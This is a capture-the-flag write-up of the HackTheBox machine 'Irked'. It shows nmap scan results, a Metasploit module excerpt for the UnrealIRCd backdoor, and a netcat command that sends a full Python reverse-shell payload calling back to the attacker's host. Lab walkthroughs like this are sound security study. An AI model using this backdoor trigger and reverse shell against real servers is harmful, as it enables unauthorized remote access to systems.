Irked

An easy linux box from HackTheBox, exploiting a CVE on an IRC server for initial access, and a misconfiguration for root

Recon #

Running nmap scanning for all ports:

Nmap scan report for 10.10.10.117  
Host is up (0.020s latency).  
Not shown: 65528 closed tcp ports (conn-refused)  
PORT      STATE SERVICE VERSION  
22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)  
| ssh-hostkey:    
|   1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA)  
|   2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA)  
|   256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA)  
|_  256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (ED25519)  
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))  
|_http-title: Site doesn't have a title (text/html).  
|_http-server-header: Apache/2.4.10 (Debian)  
111/tcp   open  rpcbind 2-4 (RPC #100000)  
| rpcinfo:    
|   program version    port/proto  service  
|   100000  2,3,4        111/tcp   rpcbind  
|   100000  2,3,4        111/udp   rpcbind  
|   100000  3,4          111/tcp6  rpcbind  
|   100000  3,4          111/udp6  rpcbind  
|   100024  1          48245/udp6  status  
|   100024  1          50084/udp   status  
|   100024  1          50281/tcp6  status  
|_  100024  1          53340/tcp   status  
6697/tcp  open  irc     UnrealIRCd  
8067/tcp  open  irc     UnrealIRCd  
53340/tcp open  status  1 (RPC #100024)  
65534/tcp open  irc     UnrealIRCd (Admin email djmardov@irked.htb)  
Service Info: Host: irked.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

See there’s a HTTP server on port 80, but its just an image of a smiley :)

Can connect to IRC (chat protocol) on port 6697 with hexchat, but nothing is in there

Now just searchsploit for UnrealIRCd and find a couple of scripts

Exploitation #

Ignoring the windows ones, can look at the linux command execution exploit

searchsploit -x exploits/linux/remote/16922.rb

def exploit  
               connect  
  
               print_status("Connected to #{rhost}:#{rport}...")  
               banner = sock.get_once(-1, 30)  
               banner.to_s.split("\n").each do |line|  
                       print_line("    #{line}")  
               end  
  
               print_status("Sending backdoor command...")  
               sock.put("AB;" + payload.encoded + "\n")  
  
               handler  
               disconnect  
       end

Seems like it’s just sending AB;{command}; and it’s getting executed on the server, so connecting to the IRC port and then typing in the payload with netcat

nc 10.10.10.117 6697
AB;python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.3",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

And get root!